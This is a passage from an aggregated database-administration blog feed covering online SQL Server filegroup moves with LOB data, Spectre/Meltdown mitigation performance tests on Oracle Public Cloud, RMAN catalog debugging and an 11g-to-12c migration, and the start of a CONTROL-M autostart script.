Cannot insert duplicate key in object 'dbo.bigTransactionHistory2'. The duplicate key value is (Jan 1 2005 12:00AM, 1).

So now we may safely move the additional structures represented by the non-clustered indexes. We just have to execute the following command to move the corresponding physical structure ONLINE:

CREATE INDEX [idx_bigTransactionHistory2_ProductID]
ON dbo.bigTransactionHistory2 ( ProductID ) 
WITH (DROP_EXISTING = ON, ONLINE = ON)
ON [FG1]

 

Let's continue with the second scenario, which consisted in moving a table ONLINE to a different filegroup with LOB data. Moving such data may be more complex than we may expect. The good news is that SQL Server 2012 introduced ONLINE operation capabilities in this area, and my customer runs SQL Server 2014.

For the demonstration, let's go back to the previous demo and introduce a new [other infos] column with VARCHAR(MAX) data. Here is the new definition of the dbo.bigTransactionHistory2 table:

CREATE TABLE [dbo].[bigTransactionHistory2](
	[TransactionID] [bigint] NOT NULL,
	[ProductID] [int] NOT NULL,
	[TransactionDate] [datetime] NOT NULL,
	[Quantity] [int] NULL,
	[ActualCost] [money] NULL,
	[other infos] [varchar](max) NULL,
 CONSTRAINT [pk_bigTransactionHistory_TransactionID] PRIMARY KEY CLUSTERED 
(
	[TransactionID] ASC
)WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY]
) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY]
GO

Let’s take a look at the table’s underlying structure:

SELECT 
	OBJECT_NAME(p.object_id) AS table_name,
	p.index_id,
	p.rows,
	au.type_desc AS alloc_unit_type,
	au.used_pages,
	fg.name AS fg_name
FROM 
	sys.partitions as p
JOIN 
	sys.allocation_units AS au on p.hobt_id = au.container_id
JOIN	
	sys.filegroups AS fg on fg.data_space_id = au.data_space_id
WHERE
	p.object_id = OBJECT_ID('bigTransactionHistory2')
ORDER BY
	table_name, index_id, alloc_unit_type

 

blog 125 - 3 - bigTransactionHistory2 with LOB

A new LOB_DATA allocation unit type is there and indicates that the table contains LOB data. At this stage, we may think that going the previous way to move the unique clustered index online is sufficient, but it is not, according to the output below:

CREATE UNIQUE CLUSTERED INDEX pk_bigTransactionHistory_TransactionID
ON dbo.bigTransactionHistory2 ( [TransactionID] )
WITH (ONLINE = ON, DROP_EXISTING = ON)
ON [FG1];

blog 125 - 4 - bigTransactionHistory2 move LOB data

In fact, only the data in the IN_ROW_DATA allocation units moved from the PRIMARY to the FG1 filegroup. In this context, moving LOB data is a non-trivial operation and I had to use a solution based on one proposed here by Kimberly L. Tripp from SQLSkills (definitely one of my favorite sources for tricky scenarios). So partitioning is the way to go. Following the solution from SQLSkills, I created a temporary partition function and scheme as shown below:

SELECT MAX([TransactionID])
FROM dbo.bigTransactionHistory2
-- 6910883
GO


CREATE PARTITION FUNCTION pf_bigTransaction_history2_temp (BIGINT)
AS RANGE RIGHT FOR VALUES (6920000)
GO

CREATE PARTITION SCHEME ps_bigTransaction_history2_temp
AS PARTITION pf_bigTransaction_history2_temp
TO ( [FG1], [PRIMARY] )
GO

Applying the scheme to the dbo.bigTransactionHistory2 table will allow us to move all data (IN_ROW_DATA and LOB_DATA) from the PRIMARY to FG1 filegroup as shown below:

CREATE UNIQUE CLUSTERED INDEX pk_bigTransactionHistory_TransactionID
ON dbo.bigTransactionHistory2 ( [TransactionID] ASC )
WITH (ONLINE = ON, DROP_EXISTING = ON)
ON ps_bigTransaction_history2_temp ([TransactionID])

Looking quickly at the storage configuration confirms that this time all the data moved to the FG1 filegroup.

blog 125 - 5 - bigTransactionHistory2 partitioning

Let’s finally remove the temporary partitioning configuration from the table (remember that all operations are performed ONLINE)

CREATE UNIQUE CLUSTERED INDEX pk_bigTransactionHistory_TransactionID
ON dbo.bigTransactionHistory2 ( [TransactionID] ASC )
WITH (ONLINE = ON, DROP_EXISTING = ON)
ON [FG1]

-- Remove underlying partition configuration
DROP PARTITION SCHEME ps_bigTransaction_history2_temp;
DROP PARTITION FUNCTION pf_bigTransaction_history2_temp;
GO

blog 125 - 6 - bigTransactionHistory2 last config

Finally, you can apply the same method to all non-clustered indexes that contain LOB data.

Cheers

The post Moving tables ONLINE on filegroup with constraints and LOB data appeared first on Blog dbi services.

Spectre and Meltdown on Oracle Public Cloud UEK

Sun, 2018-01-14 14:12

In the last post I published the strange results I had when testing physical I/O with the latest Spectre and Meltdown patches. Here is the logical I/O with SLOB cached reads.

Logical reads

I've run some SLOB cached reads with the latest patches, as well as with only KPTI disabled, and with KPTI, IBRS and IBPB disabled.
I am on the Oracle Public Cloud DBaaS with 4 OCPUs.
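
For reference, this is roughly how the state of the mitigations can be checked before each run (a rough sketch: the debugfs switches shown here are the ones exposed by the early Oracle Linux/UEK patches and may differ between kernel versions):

# current state of the Meltdown/Spectre switches as root (1 = enabled, 0 = disabled)
cat /sys/kernel/debug/x86/pti_enabled
cat /sys/kernel/debug/x86/ibrs_enabled
cat /sys/kernel/debug/x86/ibpb_enabled

# the 'nopti noibrs noibpb' runs were booted with those options on the kernel command line
cat /proc/cmdline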

DB Time(s) : 1.0 DB CPU(s) : 1.0 Logical read (blocks) : 670,001.2
DB Time(s) : 1.0 DB CPU(s) : 1.0 Logical read (blocks) : 671,145.4
DB Time(s) : 1.0 DB CPU(s) : 1.0 Logical read (blocks) : 672,464.0
DB Time(s) : 1.0 DB CPU(s) : 1.0 Logical read (blocks) : 685,706.7 nopti
DB Time(s) : 1.0 DB CPU(s) : 1.0 Logical read (blocks) : 689,291.3 nopti
DB Time(s) : 1.0 DB CPU(s) : 1.0 Logical read (blocks) : 689,386.4 nopti
DB Time(s) : 1.0 DB CPU(s) : 1.0 Logical read (blocks) : 699,301.3 nopti noibrs noibpb
DB Time(s) : 1.0 DB CPU(s) : 1.0 Logical read (blocks) : 704,773.3 nopti noibrs noibpb
DB Time(s) : 1.0 DB CPU(s) : 1.0 Logical read (blocks) : 704,908.2 nopti noibrs noibpb

This is what I expected: when disabling the mitigation for Meltdown (PTI), and some of the Spectre mitigations (IBRS and IBPB), I get slightly better performance – about 5%. This is with only one SLOB session.

However, with 2 sessions I have something completely different:

DB Time(s) : 2.0 DB CPU(s) : 2.0 Logical read (blocks) : 1,235,637.8 nopti noibrs noibpb
DB Time(s) : 2.0 DB CPU(s) : 2.0 Logical read (blocks) : 1,237,689.6 nopti
DB Time(s) : 2.0 DB CPU(s) : 2.0 Logical read (blocks) : 1,243,464.3 nopti noibrs noibpb
DB Time(s) : 2.0 DB CPU(s) : 2.0 Logical read (blocks) : 1,247,257.4 nopti
DB Time(s) : 2.0 DB CPU(s) : 2.0 Logical read (blocks) : 1,247,257.4 nopti noibrs noibpb
DB Time(s) : 2.0 DB CPU(s) : 2.0 Logical read (blocks) : 1,251,485.1
DB Time(s) : 2.0 DB CPU(s) : 2.0 Logical read (blocks) : 1,253,477.0
DB Time(s) : 2.0 DB CPU(s) : 2.0 Logical read (blocks) : 1,271,986.7

This is not a saturation situation here. My VM shape is 4 OCPUs, which is supposed to be the equivalent of 4 hyperthreaded cores.

And the difference is even more pronounced with 4 sessions (all cores used) and more:

DB Time(s) : 4.0 DB CPU(s) : 4.0 Logical read (blocks) : 2,268,272.3 nopti noibrs noibpb
DB Time(s) : 4.0 DB CPU(s) : 4.0 Logical read (blocks): 2,415,044.8


DB Time(s) : 6.0 DB CPU(s) : 6.0 Logical read (blocks) : 3,353,985.7 nopti noibrs noibpb
DB Time(s) : 6.0 DB CPU(s) : 6.0 Logical read (blocks): 3,540,736.5


DB Time(s) : 8.0 DB CPU(s) : 7.9 Logical read (blocks) : 4,365,752.3 nopti noibrs noibpb
DB Time(s) : 8.0 DB CPU(s) : 7.9 Logical read (blocks): 4,519,340.7

The graph from those is here:
CaptureOPCLIO001

If I compare with the Oracle PaaS I tested last year (https://blog.dbi-services.com/oracle-public-cloud-liops-with-4-ocpu-in-paas/), which was on Intel(R) Xeon(R) CPU E5-2690 v2 @ 3.00GHz, you can also see a nice improvement here on Intel(R) Xeon(R) CPU E5-2699C v4 @ 2.20GHz.

This test was on 4.1.12-112.14.10.el7uek.x86_64 and Oracle Linux has now released a new update: 4.1.12-112.14.11.el7uek

 

The post Spectre and Meltdown on Oracle Public Cloud UEK appeared first on Blog dbi services.

Spectre/Meltdown on Oracle Public Cloud UEK – PIO

Sat, 2018-01-13 10:24

The Spectre and Meltdown patches are now in the latest Oracle UEK kernel, after updating it with 'yum update':

[opc@PTI ~]$ rpm -q --changelog kernel-uek
| awk '/CVE-2017-5715|CVE-2017-5753|CVE-2017-5754/{print $NF}' | sort | uniq -c
43 {CVE-2017-5715}
16 {CVE-2017-5753}
71 {CVE-2017-5754}

As I did on the previous post on AWS, I’ve run quick tests on the Oracle Public Cloud.

Physical reads

I've run some SLOB I/O reads with the patches, as well as with only KPTI disabled, and with KPTI, IBRS and IBPB disabled.

And I was quite surprised by the result:


DB Time(s) : 1.0 DB CPU(s) : 0.4 Read IO requests : 23,335.6 nopti
DB Time(s) : 1.0 DB CPU(s) : 0.4 Read IO requests : 23,420.3 nopti
DB Time(s) : 1.0 DB CPU(s) : 0.4 Read IO requests : 24,857.6
DB Time(s) : 1.0 DB CPU(s) : 0.4 Read IO requests : 25,332.1


DB Time(s) : 2.0 DB CPU(s) : 0.7 Read IO requests : 39,857.7 nopti
DB Time(s) : 2.0 DB CPU(s) : 0.7 Read IO requests : 40,088.4 nopti
DB Time(s) : 2.0 DB CPU(s) : 0.7 Read IO requests : 40,627.0
DB Time(s) : 2.0 DB CPU(s) : 0.7 Read IO requests : 40,707.5


DB Time(s) : 4.0 DB CPU(s) : 0.9 Read IO requests : 47,491.4 nopti
DB Time(s) : 4.0 DB CPU(s) : 0.9 Read IO requests : 47,491.4 nopti
DB Time(s) : 4.0 DB CPU(s) : 0.9 Read IO requests : 49,438.2
DB Time(s) : 4.0 DB CPU(s) : 0.9 Read IO requests : 49,764.5


DB Time(s) : 8.0 DB CPU(s) : 1.2 Read IO requests : 54,227.9 nopti
DB Time(s) : 8.0 DB CPU(s) : 1.2 Read IO requests : 54,582.9 nopti
DB Time(s) : 8.0 DB CPU(s) : 1.3 Read IO requests : 57,288.6
DB Time(s) : 8.0 DB CPU(s) : 1.4 Read IO requests : 57,057.2

Yes. In all the tests that I've done, the IOPS is higher with KPTI enabled than when booting the kernel with the nopti option. Here is a graph with those numbers:

CaptureOPCPIO001

I did those tests on the Oracle Cloud because I know that we have very fast I/O there, in hundreds of microseconds, probably all cached in the storage:

Top 10 Foreground Events by Total Wait Time
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Total Wait Avg % DB Wait
Event Waits Time (sec) Wait time Class
------------------------------ ----------- ---------- --------- ------ --------
db file parallel read 196,921 288.8 1.47ms 48.0 User I/O
db file sequential read 581,073 216.3 372.31us 36.0 User I/O
DB CPU 210.5 35.0
 
% of Total Waits
----------------------------------------------- Waits
Total 1ms
Event Waits <8us <16us <32us <64us <128u <256u =512 Event to 32m <512 <1ms <2ms <4ms <8ms <16ms =32m
------------------------- ------ ----- ----- ----- ----- ----- ----- ----- ----- ------------------------- ------ ----- ----- ----- ----- ----- ----- ----- -----
db file parallel read 196.9K .0 1.0 99.0 db file parallel read 194.9K 1.0 15.4 74.7 8.5 .3 .1 .0 .0
db file sequential read 581.2K 17.3 69.5 13.3 db file sequential read 77.2K 86.7 10.7 2.3 .2 .1 .0 .0 .0
 

So what?

I expected higher IOPS when disabling page table isolation, because of the overhead it adds to context switches, and it is the opposite here. Maybe this is because I have a very small SGA (my goal being to have only physical reads). Note also that, as far as I know, only my guest OS has been patched for Meltdown and Spectre. We will see if the numbers are different after the next Oracle Cloud maintenance.

 

The post Spectre/Meltdown on Oracle Public Cloud UEK – PIO appeared first on Blog dbi services.

RMAN debugging during catalog import

Fri, 2018-01-12 09:36

In this post I would like to share how I have been able to troubleshoot and solve a catalog import issue using the RMAN debug function.

As we can see below, the error message provided by RMAN is not very helpful.

oracle@vmtestoradg1:/home/oracle/ [RCAT12C] rman catalog rcat/manager
Recovery Manager: Release 12.2.0.1.0

connected to recovery catalog database

RMAN> import catalog rcat/manager@RCAT11G;

Starting import catalog at 05-JAN-2018 14:11:45
connected to source recovery catalog database
RMAN-00571: ===========================================================
RMAN-00569: =============== ERROR MESSAGE STACK FOLLOWS ===============
RMAN-00571: ===========================================================
RMAN-03002: failure of import catalog command at 01/05/2018 14:11:46
RMAN-06004: ORACLE error from recovery catalog database: ORA-00933: SQL command not properly ended

RMAN>

 

Instead of looking for more information in the various log files, we can simply use the RMAN debug function.

RMAN> debug on;
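
Note that debugging can also be enabled directly on the command line and redirected to a trace file, which is handier for large outputs (the file names below are only examples):

rman catalog rcat/manager debug trace=/tmp/rman_import.trc log=/tmp/rman_import.log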

 

By running the import command again, we can extract the useful information below about the statement RMAN is complaining about.

DBGSQL:           CREATE DATABASE LINK
DBGSQL:            RCAT11G.IT.DBI-SERVICES.COM
DBGSQL:            CONNECT
DBGSQL:              TO
DBGSQL:            "RCAT"
DBGSQL:            IDENTIFIED BY
DBGSQL:            "manager"
DBGSQL:            USING
DBGSQL:            'RCAT11G'
DBGSQL:
DBGSQL:              sqlcode = 933
DBGSQL:           error: ORA-00933: SQL command not properly ended (krmkosqlerr)

 

Let's run the statement in a SQL*Plus session to understand the failure.

SQL> conn rcat/manager
Connected.
SQL> CREATE DATABASE LINK RCAT11G.IT.DBI-SERVICES.COM
CONNECT TO "RCAT" IDENTIFIED BY "manager"
USING 'RCAT11G';  2    3
CREATE DATABASE LINK RCAT11G.IT.DBI-SERVICES.COM
                                   *
ERROR at line 1:
ORA-00933: SQL command not properly ended

 

We can quickly see that the '-' character is not allowed in the database link name derived from the domain name.

Let's temporarily update the needed parameters. An instance restart will be needed.
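
Before doing so, it is worth checking the current domain and global name settings (simple checks, the output depends on your environment):

SQL> select * from global_name;
SQL> show parameter db_domain
SQL> show parameter service_names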

SQL> alter system set db_domain='dbiservices' scope=spfile;

System altered.

SQL> alter system set service_names='dbiservices' scope=both;

System altered.

SQL> alter database rename GLOBAL_NAME to "RCAT11G.dbiservices";

Database altered.

 

And our next import will be successful.

RMAN> import catalog rcat/manager@RCAT11G;

Starting import catalog at 05-JAN-2018 15:21:48
connected to source recovery catalog database
import validation complete
database unregistered from the source recovery catalog
Finished import catalog at 05-JAN-2018 15:21:52

RMAN>

 

We can then restore DB_DOMAIN, SERVICE_NAMES and GLOBAL_NAME to their previous values, followed by a restart of the catalog instance.

 

The post RMAN debugging during catalog import appeared first on Blog dbi services.

ORACLE 11g to 12c RMAN catalog migration

Fri, 2018-01-12 09:36

This is a small demo of the migration of an 11g catalog (RCAT11G) to a new 12c catalog (RCAT12C).

The demo database environments have been easily managed thanks to the dbi services DMK tool.

oracle@vmreforadg01:/home/oracle/ [RCAT11G] sqh
SQL*Plus: Release 11.2.0.4.0 

oracle@vmtestoradg1:/home/oracle/ [RCAT12C] sqh
SQL*Plus: Release 12.2.0.1.0

 

Current configuration

Displaying the list of databases registered in the RCAT11g catalog.

SQL> select instance_name from v$instance;

INSTANCE_NAME
----------------
RCAT11G

SQL> select * from rcat.rc_database;

    DB_KEY  DBINC_KEY       DBID NAME     RESETLOGS_CHANGE# RESETLOGS
---------- ---------- ---------- -------- ----------------- ---------
        41         42 3287252358 DB2TEST1                 1 05-JAN-18
         1          2   65811618 DB1TEST1                 1 05-JAN-18

 

Displaying the list of databases registered in the RCAT12c catalog.

SQL> select instance_name from v$instance;

INSTANCE_NAME
----------------
RCAT12C

SQL>  select * from rcat.rc_database;

no rows selected

 

Verifying existing backup meta data on RCAT11g.

SQL> select db_name, name from rcat.rc_datafile;

DB_NAME                        NAME
------------------------------ ------------------------------------------------------------
DB2TEST1                       /u01/oradata/DB2TEST11G/system01DB2TEST11G.dbf
DB2TEST1                       /u01/oradata/DB2TEST11G/sysaux01DB2TEST11G.dbf
DB2TEST1                       /u01/oradata/DB2TEST11G/undotbs01DB2TEST11G.dbf
DB2TEST1                       /u01/oradata/DB2TEST11G/users01DB2TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/system01DB1TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/sysaux01DB1TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/undotbs01DB1TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/users01DB1TEST11G.dbf

8 rows selected.

 

Migrating RCAT11g to RCAT12c

Importing RCAT11g catalog data into RCAT12c.

oracle@vmtestoradg1:/home/oracle/ [RCAT12C] rman catalog rcat/manager
Recovery Manager: Release 12.2.0.1.0

RMAN> import catalog rcat/manager@RCAT11G;

Starting import catalog at 05-JAN-2018 13:39:56
connected to source recovery catalog database
PL/SQL package RCAT.DBMS_RCVCAT version 11.02.00.04 in IMPCAT database is too old
RMAN-00571: ===========================================================
RMAN-00569: =============== ERROR MESSAGE STACK FOLLOWS ===============
RMAN-00571: ===========================================================
RMAN-03002: failure of import catalog command at 01/05/2018 13:39:56
RMAN-06429: IMPCAT database is not compatible with this version of RMAN

 

When using IMPORT CATALOG, the version of the source recovery catalog schema must be equal to the current version of the destination recovery catalog schema. We therefore first need to upgrade the RCAT11G catalog schema.

oracle@vmtestoradg1:/home/oracle/ [RCAT12C] sqlplus sys/manager@RCAT11G as sysdba
SQL*Plus: Release 12.2.0.1.0

SQL> @/oracle/u01/app/oracle/product/12.2.0/db_1_0/rdbms/admin/dbmsrmansys.sql

PL/SQL procedure successfully completed.


PL/SQL procedure successfully completed.


PL/SQL procedure successfully completed.


Grant succeeded.


Grant succeeded.


Grant succeeded.


Grant succeeded.


Grant succeeded.


PL/SQL procedure successfully completed.
oracle@vmtestoradg1:/home/oracle/ [RCAT12C] rman target sys/manager catalog rcat/manager@RCAT11G
Recovery Manager: Release 12.2.0.1.0

connected to target database: RCAT12C (DBID=426487514)
connected to recovery catalog database

RMAN> upgrade catalog;

recovery catalog owner is RCAT
enter UPGRADE CATALOG command again to confirm catalog upgrade

RMAN> upgrade catalog;

recovery catalog upgraded to version 12.02.00.01
DBMS_RCVMAN package upgraded to version 12.02.00.01
DBMS_RCVCAT package upgraded to version 12.02.00.01.

 

Verifying new version of RCAT11g catalog.

oracle@vmreforadg01:/u00/app/oracle/network/admin/ [RCAT11G] sqlplus rcat/manager
SQL*Plus: Release 11.2.0.4.0

SQL> select * from rcver;

VERSION
------------
12.02.00.01

 

Importing RCAT11g catalog data into RCAT12c catalog.

oracle@vmtestoradg1:/u01/app/oracle/network/admin/ [RCAT12C] rman catalog rcat/manager
Recovery Manager: Release 12.2.0.1.0

connected to recovery catalog database

RMAN> list db_unique_name all;


RMAN> import catalog rcat/manager@RCAT11G;

Starting import catalog at 05-JAN-2018 15:21:48
connected to source recovery catalog database
import validation complete
database unregistered from the source recovery catalog
Finished import catalog at 05-JAN-2018 15:21:52

RMAN> list db_unique_name all;


List of Databases
DB Key  DB Name  DB ID            Database Role    Db_unique_name
------- ------- ----------------- ---------------  ------------------
2       DB1TEST1 65811618         PRIMARY          DB1TEST11G
42      DB2TEST1 3287252358       PRIMARY          DB2TEST11G

 

Verifying new configuration

Displaying the list of databases registered in the RCAT11g catalog.

oracle@vmreforadg01:/u00/app/oracle/network/admin/ [RCAT11G] sqh
SQL*Plus: Release 11.2.0.4.0

SQL> select * from rcat.rc_database;

no rows selected

SQL> select db_name, name from rcat.rc_datafile;

no rows selected

SQL> select DB_KEY, DB_ID, START_TIME, COMPLETION_TIME from RCAT.RC_BACKUP_SET;

no rows selected

 

Displaying the list of databases registered in the RCAT12c catalog.

oracle@vmtestoradg1:/u01/app/oracle/network/admin/ [RCAT12C] sqh
SQL*Plus: Release 12.2.0.1.0

SQL> select * from rcat.rc_database;

    DB_KEY  DBINC_KEY       DBID NAME                          RESETLOGS_CHANGE# RESETLOGS FINAL_CHANGE#
---------- ---------- ---------- ----------------------------- ----------------- --------- -------------
        42         43 3287252358 DB2TEST1                                      1 05-JAN-18
         2          3   65811618 DB1TEST1                                      1 05-JAN-18

SQL> select db_name, name from rcat.rc_datafile;

DB_NAME                        NAME
------------------------------ ------------------------------------------------------------
DB2TEST1                       /u01/oradata/DB2TEST11G/users01DB2TEST11G.dbf
DB2TEST1                       /u01/oradata/DB2TEST11G/system01DB2TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/system01DB1TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/sysaux01DB1TEST11G.dbf
DB2TEST1                       /u01/oradata/DB2TEST11G/undotbs01DB2TEST11G.dbf
DB2TEST1                       /u01/oradata/DB2TEST11G/sysaux01DB2TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/undotbs01DB1TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/users01DB1TEST11G.dbf

8 rows selected.

SQL> select DB_KEY, DB_ID, START_TIME, COMPLETION_TIME from RCAT.RC_BACKUP_SET;

    DB_KEY      DB_ID START_TIME          COMPLETION_TIME
---------- ---------- ------------------- -------------------
        42 3287252358 05/01/2018 11:32:00 05/01/2018 11:32:00
        42 3287252358 05/01/2018 11:32:02 05/01/2018 11:32:06
        42 3287252358 05/01/2018 11:32:09 05/01/2018 11:32:10
        42 3287252358 05/01/2018 11:32:12 05/01/2018 11:32:12
        42 3287252358 05/01/2018 15:33:37 05/01/2018 15:33:37
        42 3287252358 05/01/2018 15:33:40 05/01/2018 15:33:45
        42 3287252358 05/01/2018 15:33:47 05/01/2018 15:33:48
        42 3287252358 05/01/2018 15:33:50 05/01/2018 15:33:50
         2   65811618 05/01/2018 11:29:36 05/01/2018 11:29:36
         2   65811618 05/01/2018 11:29:38 05/01/2018 11:29:43
         2   65811618 05/01/2018 11:29:45 05/01/2018 11:29:46
         2   65811618 05/01/2018 11:29:48 05/01/2018 11:29:48
         2   65811618 05/01/2018 15:31:17 05/01/2018 15:31:17
         2   65811618 05/01/2018 15:31:19 05/01/2018 15:31:24
         2   65811618 05/01/2018 15:31:26 05/01/2018 15:31:27
         2   65811618 05/01/2018 15:31:29 05/01/2018 15:31:29
         2   65811618 05/01/2018 15:44:47 05/01/2018 15:44:47
         2   65811618 05/01/2018 15:44:49 05/01/2018 15:44:52
         2   65811618 05/01/2018 15:44:56 05/01/2018 15:44:57
         2   65811618 05/01/2018 15:45:00 05/01/2018 15:45:00
         2   65811618 05/01/2018 15:46:53 05/01/2018 15:46:53
         2   65811618 05/01/2018 15:46:55 05/01/2018 15:47:00
         2   65811618 05/01/2018 15:47:02 05/01/2018 15:47:03
         2   65811618 05/01/2018 15:47:05 05/01/2018 15:47:05

24 rows selected.

 

Checking that new backup metadata is recorded in the RCAT12C catalog

Generating a new backup.

oracle@vmreforadg02:/u00/app/oracle/network/admin/ [DB2TEST11G] export NLS_DATE_FORMAT="DD/MM/YYYY HH24:MI:SS"
oracle@vmreforadg02:/u00/app/oracle/network/admin/ [DB2TEST11G] rmanh
Recovery Manager: Release 11.2.0.4.0

RMAN> connect target /

connected to target database: DB2TEST1 (DBID=3287252358)

RMAN> connect catalog rcat/manager@rcat12c

connected to recovery catalog database

RMAN> backup database plus archivelog;

Starting backup at 05/01/2018 15:51:14
current log archived
allocated channel: ORA_DISK_1
channel ORA_DISK_1: SID=32 device type=DISK
channel ORA_DISK_1: starting archived log backup set
channel ORA_DISK_1: specifying archived log(s) in backup set
input archived log thread=1 sequence=32 RECID=1 STAMP=964611118
input archived log thread=1 sequence=33 RECID=2 STAMP=964611131
input archived log thread=1 sequence=34 RECID=3 STAMP=964625616
input archived log thread=1 sequence=35 RECID=4 STAMP=964625629
input archived log thread=1 sequence=36 RECID=5 STAMP=964626674
channel ORA_DISK_1: starting piece 1 at 05/01/2018 15:51:16
channel ORA_DISK_1: finished piece 1 at 05/01/2018 15:51:17
piece handle=/u90/fast_recovery_area/DB2TEST11G/backupset/2018_01_05/o1_mf_annnn_TAG20180105T155116_f4z474b0_.bkp tag=TAG20180105T155116 comment=NONE
channel ORA_DISK_1: backup set complete, elapsed time: 00:00:01
Finished backup at 05/01/2018 15:51:17

Starting backup at 05/01/2018 15:51:17
using channel ORA_DISK_1
channel ORA_DISK_1: starting full datafile backup set
channel ORA_DISK_1: specifying datafile(s) in backup set
input datafile file number=00001 name=/u01/oradata/DB2TEST11G/system01DB2TEST11G.dbf
input datafile file number=00003 name=/u01/oradata/DB2TEST11G/undotbs01DB2TEST11G.dbf
input datafile file number=00002 name=/u01/oradata/DB2TEST11G/sysaux01DB2TEST11G.dbf
input datafile file number=00004 name=/u01/oradata/DB2TEST11G/users01DB2TEST11G.dbf
channel ORA_DISK_1: starting piece 1 at 05/01/2018 15:51:18
channel ORA_DISK_1: finished piece 1 at 05/01/2018 15:51:25
piece handle=/u90/fast_recovery_area/DB2TEST11G/backupset/2018_01_05/o1_mf_nnndf_TAG20180105T155117_f4z476gv_.bkp tag=TAG20180105T155117 comment=NONE
channel ORA_DISK_1: backup set complete, elapsed time: 00:00:07
channel ORA_DISK_1: starting full datafile backup set
channel ORA_DISK_1: specifying datafile(s) in backup set
including current control file in backup set
including current SPFILE in backup set
channel ORA_DISK_1: starting piece 1 at 05/01/2018 15:51:26
channel ORA_DISK_1: finished piece 1 at 05/01/2018 15:51:27
piece handle=/u90/fast_recovery_area/DB2TEST11G/backupset/2018_01_05/o1_mf_ncsnf_TAG20180105T155117_f4z47glg_.bkp tag=TAG20180105T155117 comment=NONE
channel ORA_DISK_1: backup set complete, elapsed time: 00:00:01
Finished backup at 05/01/2018 15:51:27

Starting backup at 05/01/2018 15:51:27
current log archived
using channel ORA_DISK_1
channel ORA_DISK_1: starting archived log backup set
channel ORA_DISK_1: specifying archived log(s) in backup set
input archived log thread=1 sequence=37 RECID=6 STAMP=964626687
channel ORA_DISK_1: starting piece 1 at 05/01/2018 15:51:28
channel ORA_DISK_1: finished piece 1 at 05/01/2018 15:51:29
piece handle=/u90/fast_recovery_area/DB2TEST11G/backupset/2018_01_05/o1_mf_annnn_TAG20180105T155128_f4z47jn7_.bkp tag=TAG20180105T155128 comment=NONE
channel ORA_DISK_1: backup set complete, elapsed time: 00:00:01
Finished backup at 05/01/2018 15:51:29

 

Verifying backup set in new RCAT12c catalog.

oracle@vmtestoradg1:/u01/app/oracle/network/admin/ [RCAT12C] sqh
SQL*Plus: Release 12.2.0.1.0

SQL> select sysdate from dual;

SYSDATE
-------------------
05/01/2018 15:53:16

SQL> select DB_KEY, DB_ID, START_TIME, COMPLETION_TIME from RCAT.RC_BACKUP_SET;

    DB_KEY      DB_ID START_TIME          COMPLETION_TIME
---------- ---------- ------------------- -------------------
        42 3287252358 05/01/2018 11:32:00 05/01/2018 11:32:00
        42 3287252358 05/01/2018 11:32:02 05/01/2018 11:32:06
        42 3287252358 05/01/2018 11:32:09 05/01/2018 11:32:10
        42 3287252358 05/01/2018 11:32:12 05/01/2018 11:32:12
        42 3287252358 05/01/2018 15:33:37 05/01/2018 15:33:37
        42 3287252358 05/01/2018 15:33:40 05/01/2018 15:33:45
        42 3287252358 05/01/2018 15:33:47 05/01/2018 15:33:48
        42 3287252358 05/01/2018 15:33:50 05/01/2018 15:33:50
        42 3287252358 05/01/2018 15:51:16 05/01/2018 15:51:16
        42 3287252358 05/01/2018 15:51:18 05/01/2018 15:51:21
        42 3287252358 05/01/2018 15:51:25 05/01/2018 15:51:26
        42 3287252358 05/01/2018 15:51:28 05/01/2018 15:51:28
         2   65811618 05/01/2018 11:29:36 05/01/2018 11:29:36
         2   65811618 05/01/2018 11:29:38 05/01/2018 11:29:43
         2   65811618 05/01/2018 11:29:45 05/01/2018 11:29:46
         2   65811618 05/01/2018 11:29:48 05/01/2018 11:29:48
         2   65811618 05/01/2018 15:31:17 05/01/2018 15:31:17
         2   65811618 05/01/2018 15:31:19 05/01/2018 15:31:24
         2   65811618 05/01/2018 15:31:26 05/01/2018 15:31:27
         2   65811618 05/01/2018 15:31:29 05/01/2018 15:31:29
         2   65811618 05/01/2018 15:44:47 05/01/2018 15:44:47
         2   65811618 05/01/2018 15:44:49 05/01/2018 15:44:52
         2   65811618 05/01/2018 15:44:56 05/01/2018 15:44:57
         2   65811618 05/01/2018 15:45:00 05/01/2018 15:45:00
         2   65811618 05/01/2018 15:46:53 05/01/2018 15:46:53
         2   65811618 05/01/2018 15:46:55 05/01/2018 15:47:00
         2   65811618 05/01/2018 15:47:02 05/01/2018 15:47:03
         2   65811618 05/01/2018 15:47:05 05/01/2018 15:47:05

28 rows selected.

 

 

 

The post ORACLE 11g to 12c RMAN catalog migration appeared first on Blog dbi services.

Automatic start/stop for CONTROL-M v9

Fri, 2018-01-12 09:35

In this post, I would like to share how to implement automatic start and stop for CONTROL-M/Server, CONTROL-M/Agent and CONTROL-M/EM running on individual Oracle Linux 7 servers, by implementing some updates to the existing BMC procedure and script.
CONTROL-M is running version 9 and we are using the internal PostgreSQL database.
The user created for the CONTROL-M/Server and CONTROL-M/Agent environment is ctmuser, the user created for the CONTROL-M/EM environment is emuser.

BMC CONTROL-M Workload Automation documentation

CONTROL-M/Server

With ctmuser, update the existing rc.ctmuser file provided with the BMC distribution by adding the start_ctm part (/home/ctmuser is the home directory of the installation). This command was missing from the existing script and guarantees a proper startup of the CONTROL-M Server. The rc.ctmuser script content will then be as follows.

    ctmsrv% cat /home/ctmuser/ctm_server/data/rc.ctmuser

    # start database at boot
    su - ctmuser -c dbversion
    if [ $? -eq 0 ] ; then
      echo "SQL Server is already running "
    else
      if [ -f /home/ctmuser/ctm_server/scripts/startdb ]; then
      echo "Starting SQL server for CONTROL-M"
      su - ctmuser -c startdb
      echo "Sleeping for 20"
      sleep 20
      fi
    fi

    # start CONTROL-M Server at boot
    if [ -f /home/ctmuser/ctm_server/scripts/start_ctm ]; then
